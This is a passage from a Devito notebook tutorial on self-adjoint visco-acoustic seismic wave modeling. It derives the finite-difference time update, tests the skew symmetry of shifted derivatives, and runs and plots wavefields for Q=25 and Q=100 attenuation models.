attenuation model is not in scope for this tutorial, but one important point is that the physics in the absorbing boundary region and the interior of the model are *unified*, allowing the same modeling equations to be used everywhere, with physical Q values in the interior tapering to non-physical small Q at the boundaries to attenuate outgoing waves. ## Outline 1. Define symbols 2. Introduce the SA wave equation 3. Show generation of skew symmetric derivatives and prove correctness with unit test 4. Derive the time update equation used to implement the nonlinear forward modeling operator 5. Create the Devito grid and model fields 6. Define a function to implement the attenuation profile ($\omega\ /\ Q$) 7. Create the Devito operator 8. Run the Devito operator 9. Plot the resulting wavefields 10. References ## Table of symbols | Symbol &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | Description | Dimensionality | | :--- | :--- | :--- | | $\omega_c = 2 \pi f_c$ | center angular frequency | constant | | $m(x,y,z)$ | P wave velocity | function of space | | $b(x,y,z)$ | buoyancy $(1 / \rho)$ | function of space | | $Q(x,y,z)$ | Attenuation at frequency $\omega_c$ | function of space | | $u(t,x,y,z)$ | Pressure wavefield | function of time and space | | $q(t,x,y,z)$ | Source term | function of time, localized in space | | $\overleftarrow{\partial_t}$ | shifted first derivative wrt $t$ | shifted 1/2 sample backward in time | | $\partial_{tt}$ | centered second derivative wrt $t$ | centered in time | | $\overrightarrow{\partial_x},\ \overrightarrow{\partial_y},\ \overrightarrow{\partial_z}$ | + shifted first derivative wrt $x,y,z$ | shifted 1/2 sample forward in space | | $\overleftarrow{\partial_x},\ \overleftarrow{\partial_y},\ \overleftarrow{\partial_z}$ | - shifted first derivative wrt $x,y,z$ | shifted 1/2 sample backward in space | | $\Delta_t, \Delta_x, \Delta_y, \Delta_z$ | sampling rates for $t, x, y , z$ | $t, x, y , z$ | ## A word about notation We use the arrow symbols over derivatives $\overrightarrow{\partial_x}$ as a shorthand notation to indicate that the derivative is taken at a shifted location. For example: - $\overrightarrow{\partial_x}\ u(t,x,y,z)$ indicates that the $x$ derivative of $u(t,x,y,z)$ is taken at $u(t,x+\frac{\Delta x}{2},y,z)$. - $\overleftarrow{\partial_z}\ u(t,x,y,z)$ indicates that the $z$ derivative of $u(t,x,y,z)$ is taken at $u(t,x,y,z-\frac{\Delta z}{2})$. - $\overleftarrow{\partial_t}\ u(t,x,y,z)$ indicates that the $t$ derivative of $u(t,x,y,z)$ is taken at $u(t-\frac{\Delta_t}{2},x,y,z)$. We usually drop the $(t,x,y,z)$ notation from wavefield variables unless required for clarity of exposition, so that $u(t,x,y,z)$ becomes $u$. ## Self adjoint variable density visco- acoustic wave equation Our self adjoint wave equation is written: $$ \frac{b}{m^2} \left( \frac{\omega_c}{Q} \overleftarrow{\partial_t}\ u + \partial_{tt}\ u \right) = \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q $$ An advantage of this form is that the same system can be used to provide *stable modes of propagation* for all operations needed in quasi- Newton optimization: - the nonlinear forward - the linearized forward (Jacobian forward) - the linearized adjoint (Jacobian adjoint) This advantage is more important for anisotropic operators, where widely utilized non energy conserving formulations can provide unstable adjoints and thus unstable gradients for anisotropy parameters. The *self adjoint* formulation is evident in the shifted spatial derivatives, with the derivative on the right side $\overrightarrow{\partial}$ shifting forward in space one-half cell, and the derivative on the left side $\overleftarrow{\partial}$ shifting backward in space one-half cell. $\overrightarrow{\partial}$ and $\overleftarrow{\partial}$ are anti-symmetric (also known as skew symmetric), meaning that for two random vectors $x_1$ and $x_2$, correctly implemented numerical derivatives will have the following property: $$ x_2 \cdot \left( \overrightarrow{\partial_x}\ x_1 \right) \approx -\ x_1 \cdot \left( \overleftarrow{\partial_x}\ x_2 \right) $$ Below we will demonstrate this skew symmetry with a simple unit test on Devito generated derivatives. In the following notebooks in this series, material parameters *sandwiched* between the derivatives -- including anisotropy parameters -- become much more interesting, but here buoyancy $b$ is the only material parameter between derivatives in our self adjoint (SA) wave equation. ## Imports We have grouped all imports used in this notebook here for consistency. ``` import numpy as np from examples.seismic import RickerSource, Receiver, TimeAxis from devito import (Grid, Function, TimeFunction, SpaceDimension, Constant, Eq, Operator, solve, configuration, norm) from devito.finite_differences import Derivative from devito.builtins import gaussian_smooth from examples.seismic.self_adjoint import setup_w_over_q import matplotlib as mpl import matplotlib.pyplot as plt from matplotlib import cm from timeit import default_timer as timer # These lines force images to be displayed in the notebook, and scale up fonts %matplotlib inline mpl.rc('font', size=14) # Make white background for plots, not transparent plt.rcParams['figure.facecolor'] = 'white' # Set logging to debug, captures statistics on the performance of operators configuration['log-level'] = 'DEBUG' ``` ## Unit test demonstrating skew symmetry for shifted derivatives As noted above, we prove with a small 1D unit test and 8th order spatial operator that the Devito shifted first derivatives are skew symmetric. This anti-symmetry can be demonstrated for the forward and backward half cell shift first derivative operators $\overrightarrow{\partial}$ and $\overleftarrow{\partial}$ with two random vectors $x_1$ and $x_2$ by verifying the *dot product test* as written above. We will use Devito to implement the following two equations with an ```Operator```: $$ \begin{aligned} f_2 = \overrightarrow{\partial_x}\ f_1 \\[5pt] g_2 = \overleftarrow{\partial_x}\ g_1 \end{aligned} $$ And then verify the dot products are equivalent. Recall that skew symmetry introduces a minus sign in this equality: $$ f_1 \cdot g_2 \approx - g_1 \cdot f_2 $$ We use the following test for relative error (note the flipped signs in numerator and denominator due to anti- symmetry): $$ \frac{\displaystyle f_1 \cdot g_2 + g_1 \cdot f_2} {\displaystyle f_1 \cdot g_2 - g_1 \cdot f_2}\ <\ \epsilon $$ ``` # NBVAL_IGNORE_OUTPUT # Make 1D grid to test derivatives n = 101 d = 1.0 shape = (n, ) spacing = (1 / (n-1), ) origin = (0., ) extent = (d * (n-1), ) dtype = np.float64 # Initialize Devito grid and Functions for input(f1,g1) and output(f2,g2) # Note that space_order=8 allows us to use an 8th order finite difference # operator by properly setting up grid accesses with halo cells grid1d = Grid(shape=shape, extent=extent, origin=origin, dtype=dtype) x = grid1d.dimensions[0] f1 = Function(name='f1', grid=grid1d, space_order=8) f2 = Function(name='f2', grid=grid1d, space_order=8) g1 = Function(name='g1', grid=grid1d, space_order=8) g2 = Function(name='g2', grid=grid1d, space_order=8) # Fill f1 and g1 with random values in [-1,+1] f1.data[:] = -1 + 2 * np.random.rand(n,) g1.data[:] = -1 + 2 * np.random.rand(n,) # Equation defining: [f2 = forward 1/2 cell shift derivative applied to f1] equation_f2 = Eq(f2, f1.dx(x0=x+0.5*x.spacing)) # Equation defining: [g2 = backward 1/2 cell shift derivative applied to g1] equation_g2 = Eq(g2, g1.dx(x0=x-0.5*x.spacing)) # Define an Operator to implement these equations and execute op = Operator([equation_f2, equation_g2]) op() # Compute the dot products and the relative error f1g2 = np.dot(f1.data, g2.data) g1f2 = np.dot(g1.data, f2.data) diff = (f1g2+g1f2)/(f1g2-g1f2) tol = 100 * np.finfo(dtype).eps print("f1g2, g1f2, diff, tol; %+.6e %+.6e %+.6e %+.6e" % (f1g2, g1f2, diff, tol)) # At last the unit test # Assert these dot products are float epsilon close in relative error assert diff < 100 * np.finfo(dtype).eps ``` ## Show the finite difference operators and generated code You can inspect the finite difference coefficients and locations for evaluation with the code shown below. For your reference, the finite difference coefficients seen in the first two stanzas below are exactly the coefficients generated in Table 2 of Fornberg's paper **Generation of Finite Difference Formulas on Arbitrarily Spaced Grids** linked below ([References](#nl_refs)). Note that you don't need to inspect the generated code, but this does provide the option to use this highly optimized code in applications that do not need or require python. If you inspect the code you will notice hallmarks of highly optimized c code, including ```pragmas``` for vectorization, and ```decorations``` for pointer restriction and alignment. ``` # NBVAL_IGNORE_OUTPUT # Show the FD coefficients generated by Devito # for the forward 1/2 cell shifted first derivative operator print("\n\nForward +1/2 cell shift;") print("..................................") print(f1.dx(x0=x+0.5*x.spacing).evaluate) # Show the FD coefficients generated by Devito # for the backward 1/2 cell shifted first derivative operator print("\n\nBackward -1/2 cell shift;") print("..................................") print(f1.dx(x0=x-0.5*x.spacing).evaluate) # Show code generated by Devito for applying the derivatives print("\n\nGenerated c code;") print("..................................") print(op.ccode) ``` ## Doing some algebra to solve for the time update The next step in implementing our Devito modeling operator is to define the equation used to update the pressure wavefield as a function of time. What follows is a bit of algebra using the wave equation and finite difference approximations to time derivatives to express the pressure wavefield forward in time $u(t+\Delta_t)$ as a function of the current $u(t)$ and previous $u(t-\Delta_t)$ pressure wavefields. #### 1. Numerical approximation for $\partial_{tt}\ u$, solved for for $u(t+\Delta_t)$ The second order accurate centered approximation to the second time derivative involves three wavefields: $u(t-\Delta_t)$, $u(t)$, and $u(t+\Delta_t)$. In order to advance our finite difference solution in time, we solve for $u(t+\Delta_t)$. $$ \begin{aligned} \partial_{tt}\ u &= \frac{\displaystyle u(t+\Delta_t) - 2\ u(t) + u(t-\Delta_t)}{\displaystyle \Delta_t^2} \\[5pt] u(t+\Delta_t)\ &= \Delta_t^2\ \partial_{tt}\ u + 2\ u(t) - u(t-\Delta_t) \end{aligned} $$ #### 2. Numerical approximation for $\overleftarrow{\partial_{t}}\ u$ The argument for using a backward approximation is a bit hand wavy, but goes like this: a centered or forward approximation for $\partial_{t}\ u$ would involve the term $u(t+\Delta_t)$, and hence $u(t+\Delta_t)$ would appear at two places in our time update equation below, essentially making the form implicit (although it would be easy to solve for $u(t+\Delta_t)$). We are interested in explicit time stepping and the correct behavior of the attenuation term, and so prefer the backward approximation for $\overleftarrow{\partial_{t}}\ u$. Our experience is that the use of the backward difference is more stable than forward or centered. The first order accurate backward approximation to the first time derivative involves two wavefields: $u(t-\Delta_t)$, and $u(t)$. We can use this expression as is. $$ \overleftarrow{\partial_{t}}\ u = \frac{\displaystyle u(t) - u(t-\Delta_t)}{\displaystyle \Delta_t} $$ #### 3. Solve the wave equation for $\partial_{tt}$ $$ \begin{aligned} \frac{b}{m^2} \left( \frac{\omega_c}{Q} \overleftarrow{\partial_{t}}\ u + \partial_{tt}\ u \right) &= \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q\\[10pt] \partial_{tt}\ u &= \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] - \frac{\omega_c}{Q} \overleftarrow{\partial_{t}}\ u \end{aligned} $$ #### 4. Plug in $\overleftarrow{\partial_t} u$ and $\partial_{tt} u$ into the time update equation Next we plug in the right hand sides for $\partial_{tt}\ u$ and $\overleftarrow{\partial_{t}}\ u$ into the the time update expression for $u(t+\Delta_t)$ from step 2. $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad -\ \Delta_t^2 \frac{\omega_c}{Q} \left( \frac{\displaystyle u(t) - u(t-\Delta_t)} {\displaystyle \Delta_t} \right) + 2\ u(t) - u(t-\Delta_t) \end{aligned} $$ #### 5. Simplify ... $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad \left(2 -\ \Delta_t\ \frac{\omega_c}{Q} \right) u(t) + \left(\Delta_t\ \frac{\omega_c}{Q} - 1 \right) u(t-\Delta_t) \end{aligned} $$ #### 6. et voila ... The last equation is how we update the pressure wavefield at each time step, and depends on $u(t)$ and $u(t-\Delta_t)$. The main work of the finite difference explicit time stepping is evaluating the nested spatial derivative operators on the RHS of this equation. The particular advantage of Devito symbolic optimization is that Devito is able to solve for the complicated expressions that result from substituting the discrete forms of high order numerical finite difference approximations for these nested spatial derivatives. We have now completed the maths required to implement the modeling operator. The remainder of this notebook deals with setting up and using the required Devito objects. ## Instantiate the Devito grid for a two dimensional problem Define the dimensions and coordinates for the model. The computational domain of the model is surrounded by an *absorbing boundary region* where we implement boundary conditions to eliminate outgoing waves. We define the sizes for the interior of the model ```nx``` and ```nz```, the width of the absorbing boundary region ```npad```, and the sizes for the entire model padded with absorbing boundaries become ```nxpad = nx + 2*npad``` and ```nzpad = nz + 2*npad```. ``` # Define dimensions for the interior of the model nx,nz = 751,751 dx,dz = 10.0,10.0 # Grid spacing in m shape = (nx, nz) # Number of grid points spacing = (dx, dz) # Domain size is now 5 km by 5 km origin = (0., 0.) # Origin of coordinate system, specified in m. extent = tuple([s*(n-1) for s, n in zip(spacing, shape)]) # Define dimensions for the model padded with absorbing boundaries npad = 50 # number of points in absorbing boundary region (all sides) nxpad,nzpad = nx+2*npad, nz+2*npad shape_pad = np.array(shape) + 2 * npad origin_pad = tuple([o - s*npad for o, s in zip(origin, spacing)]) extent_pad = tuple([s*(n-1) for s, n in zip(spacing, shape_pad)]) # Define the dimensions # Note if you do not specify dimensions, you get in order x,y,z x = SpaceDimension(name='x', spacing=Constant(name='h_x', value=extent_pad[0]/(shape_pad[0]-1))) z = SpaceDimension(name='z', spacing=Constant(name='h_z', value=extent_pad[1]/(shape_pad[1]-1))) # Initialize the Devito grid grid = Grid(extent=extent_pad, shape=shape_pad, origin=origin_pad, dimensions=(x, z), dtype=dtype) print("shape; ", shape) print("origin; ", origin) print("spacing; ", spacing) print("extent; ", extent) print("") print("shape_pad; ", shape_pad) print("origin_pad; ", origin_pad) print("extent_pad; ", extent_pad) print("") print("grid.shape; ", grid.shape) print("grid.extent; ", grid.extent) print("grid.spacing_map;", grid.spacing_map) ``` ## Define velocity and buoyancy model parameters We have the following constants and fields from our self adjoint wave equation that we define as time invariant using ```Functions```: | &nbsp; Symbol &nbsp; | Description | | :---: | :--- | | $$m(x,z)$$ | Acoustic velocity | | $$b(x,z)=\frac{1}{\rho(x,z)}$$ | Buoyancy (reciprocal density) | ``` # Create the velocity and buoyancy fields. # - We use a wholespace velocity of 1500 m/s # - We use a wholespace density of 1 g/cm^3 # - These are scalar fields so we use Function to define them # - We specify space_order to establish the appropriate size halo on the edges space_order = 8 # Wholespace velocity m = Function(name='m', grid=grid, space_order=space_order) m.data[:] = 1.5 # Constant density b = Function(name='b', grid=grid, space_order=space_order) b.data[:,:] = 1.0 / 1.0 ``` ## Define the simulation time range In this notebook we run 2 seconds of simulation using the sample rate related to the CFL condition as implemented in ```examples/seismic/self_adjoint/utils.py```. **Important note** smaller Q values in highly viscous media may require smaller temporal sampling rates than a non-viscous medium to achieve dispersion free propagation. This is a cost of the visco- acoustic modification we use here. We also use the convenience ```TimeRange``` as defined in ```examples/seismic/source.py```. ``` def compute_critical_dt(v): """ Determine the temporal sampling to satisfy CFL stability. This method replicates the functionality in the Model class. Note we add a safety factor, reducing dt by a factor 0.75 due to the w/Q attentuation term. Parameters ---------- v : Function velocity """ coeff = 0.38 if len(v.grid.shape) == 3 else 0.42 dt = 0.75 * v.dtype(coeff * np.min(v.grid.spacing) / (np.max(v.data))) return v.dtype("%.5e" % dt) t0 = dtype(0.) # Simulation time start tn = dtype(2000.) # Simulation time end (1 second = 1000 msec) dt = compute_critical_dt(m) time_range = TimeAxis(start=t0, stop=tn, step=dt) print("Time min, max, dt, num; %10.6f %10.6f %10.6f %d" % (t0, tn, dt, int(tn//dt) + 1)) print("time_range; ", time_range) ``` ## Define the acquisition geometry: locations of sources and receivers **source**: - X coordinate: center of the model: dx*(nx//2) - Z coordinate: center of the model: dz*(nz//2) - We use a 10 Hz center frequency [RickerSource](https://github.com/devitocodes/devito/blob/master/examples/seismic/source.py#L280) wavelet as defined in ```examples/seismic/source.py``` **receivers**: - X coordinate: center of the model: dx*(nx//2) - Z coordinate: vertical line from top to bottom of model - We use a vertical line of [Receivers](https://github.com/devitocodes/devito/blob/master/examples/seismic/source.py#L80) as defined with a ```PointSource``` in ```examples/seismic/source.py``` ``` # NBVAL_IGNORE_OUTPUT # Source in the center of the model at 10 Hz center frequency fpeak = 0.010 src = RickerSource(name='src', grid=grid, f0=fpeak, npoint=1, time_range=time_range) src.coordinates.data[0,0] = dx * (nx//2) src.coordinates.data[0,1] = dz * (nz//2) # line of receivers along the right edge of the model rec = Receiver(name='rec', grid=grid, npoint=nz, time_range=time_range) rec.coordinates.data[:,0] = dx * (nx//2) rec.coordinates.data[:,1] = np.linspace(0.0, dz*(nz-1), nz) print("src_coordinate X; %+12.4f" % (src.coordinates.data[0,0])) print("src_coordinate Z; %+12.4f" % (src.coordinates.data[0,1])) print("rec_coordinates X min/max; %+12.4f %+12.4f" % \ (np.min(rec.coordinates.data[:,0]), np.max(rec.coordinates.data[:,0]))) print("rec_coordinates Z min/max; %+12.4f %+12.4f" % \ (np.min(rec.coordinates.data[:,1]), np.max(rec.coordinates.data[:,1]))) # We can plot the time signature to see the wavelet src.show() ``` ## Plot velocity and density models Next we plot the velocity and density models for illustration. - The demarcation between interior and absorbing boundary is shown with a dotted white line - The source is shown as a large red asterisk - The extent of the receiver array is shown with a thick black line ``` # note: flip sense of second dimension to make the plot positive downwards plt_extent = [origin_pad[0], origin_pad[0] + extent_pad[0], origin_pad[1] + extent_pad[1], origin_pad[1]] vmin, vmax = 1.4, 1.7 dmin, dmax = 0.9, 1.1 plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(m.data), cmap=cm.jet, vmin=vmin, vmax=vmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Velocity (m/msec)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Velocity w/ absorbing boundary") plt.subplot(1, 2, 2) plt.imshow(np.transpose(1 / b.data), cmap=cm.jet, vmin=dmin, vmax=dmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Density (m^3/kg)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Density w/ absorbing boundary") plt.tight_layout() None ``` ## Create and plot the $\frac{\omega_c}{Q}$ model used for dissipation only attenuation We have two remaining constants and fields from our SA wave equation that we need to define: | &nbsp; Symbol &nbsp; | Description | | :---: | :--- | | $$\omega_c = 2 \pi f_c$$ | Center angular frequency | | $$\frac{1}{Q(x,z)}$$ | Inverse Q model used in the modeling system | The absorbing boundary condition strategy we use is designed to eliminate any corners or edges in the attenuation profile. We do this by making Q a function of *distance from the nearest boundary*. We have implemented the function ```setup_w_over_q``` for 2D and 3D fields in the file ```utils.py```, and will use it below. In Devito these fields are type ```Function```, a concrete implementation of ```AbstractFunction```. Feel free to inspect the source at [utils.py](utils.py), which uses Devito's symbolic math to write a nonlinear equation describing the absorbing boundary for dispatch to automatic code generation. Note that we will generate two Q models, one with strong attenuation (a Q value of 25) and one with moderate attenuation (a Q value of 100) -- in order to demonstrate the impact of attenuation in the plots near the end of this notebook. ``` # NBVAL_IGNORE_OUTPUT # Initialize the attenuation profile for Q=25 and Q=100 models w = 2.0 * np.pi * fpeak print("w,fpeak; ", w, fpeak) qmin = 0.1 wOverQ_025 = Function(name='wOverQ_025', grid=grid, space_order=space_order) wOverQ_100 = Function(name='wOverQ_100', grid=grid, space_order=space_order) setup_w_over_q(wOverQ_025, w, qmin, 25.0, npad) setup_w_over_q(wOverQ_100, w, qmin, 100.0, npad) # Plot the log of the generated Q profile q025 = np.log10(w / wOverQ_025.data) q100 = np.log10(w / wOverQ_100.data) lmin, lmax = np.log10(qmin), np.log10(100) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(q025.data), cmap=cm.jet, vmin=lmin, vmax=lmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='log10(Q)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("log10 of $Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(np.transpose(q100.data), cmap=cm.jet, vmin=lmin, vmax=lmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='log10(Q)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("log10 of $Q=100$ model") plt.tight_layout() None ``` ## Define the pressure wavefield as a ```TimeFunction``` We specify the time_order as 2, which allocates 3 time steps in the pressure wavefield. As described elsewhere, Devito will use "cyclic indexing" to index into this multi-dimensional array, mneaning that via the *modulo operator*, the time indices $[0, 1, 2, 3, 4, 5, ...]$ are mapped into the modulo indices $[0, 1, 2, 0, 1, 2, ...]$ This [FAQ entry](https://github.com/devitocodes/devito/wiki/FAQ#as-time-increases-in-the-finite-difference-evolution-are-wavefield-arrays-swapped-as-you-might-see-in-cc-code) explains in more detail. ``` # Define the TimeFunction u = TimeFunction(name="u", grid=grid, time_order=2, space_order=space_order) # Get the symbols for dimensions for t, x, z # We need these below in order to write the source injection and the t,x,z = u.dimensions ``` ## Define the source injection and receiver extraction If you examine the equation for the time update we derived above you will see that the source $q$ is scaled by the term $(\Delta_t^2 m^2\ /\ b)$. You will see that scaling term in the source injection below. For $\Delta_t^2$ we use the time dimension spacing symbol ```t.spacing**2```. Note that source injection and receiver extraction are accomplished via linear interpolation, as implemented in ```SparseTimeFunction``` in [sparse.py](https://github.com/devitocodes/devito/blob/master/devito/types/sparse.py#L747). ``` # Source injection, with appropriate scaling src_term = src.inject(field=u.forward, expr=src * t.spacing**2 * m**2 / b) # Receiver extraction rec_term = rec.interpolate(expr=u.forward) ``` ## Finally, the Devito operator We next transcribe the time update expression we derived above into a Devito ```Eq```. Then we add that expression with the source injection and receiver extraction and build an ```Operator``` that will generate the c code for performing the modeling. We copy the time update expression from above for clarity. Note we omit $q$ because we will be explicitly injecting the source using ```src_term``` defined immediately above. However, for the linearized *Born forward modeling* operation the $q$ term is an appropriately scaled field, as shown in the next notebook in this series. $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad \left(2 -\ \Delta_t\ \frac{\omega_c}{Q} \right) u(t) + \left(\Delta_t\ \frac{\omega_c}{Q} - 1 \right) u(t-\Delta_t) \end{aligned} $$ ``` # NBVAL_IGNORE_OUTPUT # Generate the time update equation and operator for Q=25 model eq_time_update = (t.spacing**2 * m**2 / b) * \ ((b * u.dx(x0=x+x.spacing/2)).dx(x0=x-x.spacing/2) + \ (b * u.dz(x0=z+z.spacing/2)).dz(x0=z-z.spacing/2)) + \ (2 - t.spacing * wOverQ_025) * u + \ (t.spacing * wOverQ_025 - 1) * u.backward stencil = Eq(u.forward, eq_time_update) # Update the dimension spacing_map to include the time dimension # These symbols will be replaced with the relevant scalars by the Operator spacing_map = grid.spacing_map spacing_map.update({t.spacing : dt}) print("spacing_map; ", spacing_map) # op = Operator([stencil] + src_term + rec_term) op = Operator([stencil] + src_term + rec_term, subs=spacing_map) ``` ## Impact of hardwiring the grid spacing on operation count The argument ```subs=spacing_map``` passed to the operator substitutes values for the temporal and spatial dimensions into the expressions before code generation. This reduces the number of floating point operations executed by the kernel by pre-evaluating certain coefficients, and possibly absorbing the spacing scalars from the denominators of the numerical finite difference approximations into the finite difference coefficients. If you run the two cases of passing/not passing the ```subs=spacing_map``` argument by commenting/un-commenting the last two lines of the cell immediately above, you can inspect the difference in computed flop count for the operator. This is reported by setting Devito logging ```configuration['log-level'] = 'DEBUG'``` and is reported during Devito symbolic optimization with the output line ```Flops reduction after symbolic optimization```. Note also if you inspect the generated code for the two cases, you will see extra calling parameters are required for the case without the substitution. We have compiled the flop count for 2D and 3D operators into the table below. | Dimensionality | Passing subs | Flops reduction | Delta | |:---:|:---:|:---:|:---:| | 2D | False | 588 --> 81 | | | 2D | True | 300 --> 68 | 13.7% | | 3D | False | 875 --> 116 | | | 3D | True | 442 --> 95 | 18.1% | Note the gain in performance is around 14% for this example in 2D, and around 18% in 3D. ## Print the arguments to the Devito operator We use ```op.arguments()``` to print the arguments to the operator. As noted above depending on the use of ```subs=spacing_map``` you will see different arguments here. In the case of no ```subs=spacing_map``` argument to the operator, you will see arguments for the dimensional spacing constants as parameters to the operator, including ```h_x```, ```h_z```, and ```dt```. ``` # NBVAL_IGNORE_OUTPUT op.arguments() ``` ## Print the generated c code for review We use ```print(op)``` to output the generated c code for review. ``` # NBVAL_IGNORE_OUTPUT print(op) ``` ## Run the operator for the Q=25 and Q=100 models By setting Devito logging ```configuration['log-level'] = 'DEBUG'``` we have enabled output of statistics related to the performance of the operator, which you will see below when the operator runs. We will run the Operator once with the Q model as defined ```wOverQ_025```, and then run a second time passing the ```wOverQ_100``` Q model. For the second run with the different Q model, we take advantage of the ```placeholder design patten``` in the Devito ```Operator```. For more information on this see the [FAQ](https://github.com/devitocodes/devito/wiki/FAQ#how-are-abstractions-used-in-the-seismic-examples) entry. ``` # NBVAL_IGNORE_OUTPUT # Run the operator for the Q=25 model print("m min/max; %+12.6e %+12.6e" % (np.min(m.data), np.max(m.data))) print("b min/max; %+12.6e %+12.6e" % (np.min(b.data), np.max(b.data))) print("wOverQ_025 min/max; %+12.6e %+12.6e" % (np.min(wOverQ_025.data), np.max(wOverQ_025.data))) print("wOverQ_100 min/max; %+12.6e %+12.6e" % (np.min(wOverQ_100.data), np.max(wOverQ_100.data))) print(time_range) u.data[:] = 0 op(time=time_range.num-1) # summary = op(time=time_range.num-1, h_x=dx, h_z=dz, dt=dt) # Save the Q=25 results and run the Q=100 case import copy uQ25 = copy.copy(u) recQ25 = copy.copy(rec) u.data[:] = 0 op(time=time_range.num-1, wOverQ_025=wOverQ_100) print("Q= 25 receiver data min/max; %+12.6e %+12.6e" %\ (np.min(recQ25.data[:]), np.max(recQ25.data[:]))) print("Q=100 receiver data min/max; %+12.6e %+12.6e" %\ (np.min(rec.data[:]), np.max(rec.data[:]))) # Continuous integration hooks # We ensure the norm of these computed wavefields is repeatable assert np.isclose(norm(uQ25), 26.749, atol=0, rtol=1e-3) assert np.isclose(norm(u), 161.131, atol=0, rtol=1e-3) assert np.isclose(norm(recQ25), 368.153, atol=0, rtol=1e-3) assert np.isclose(norm(rec), 413.414, atol=0, rtol=1e-3) ``` ## Plot the computed Q=25 and Q=100 wavefields ``` # NBVAL_IGNORE_OUTPUT # Plot the two wavefields, normalized to Q=100 (the larger amplitude) amax_Q25 = 1.0 * np.max(np.abs(uQ25.data[1,:,:])) amax_Q100 = 1.0 * np.max(np.abs(u.data[1,:,:])) print("amax Q= 25; %12.6f" % (amax_Q25)) print("amax Q=100; %12.6f" % (amax_Q100)) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(uQ25.data[1,:,:] / amax_Q100), cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Amplitude') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'black', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Data for 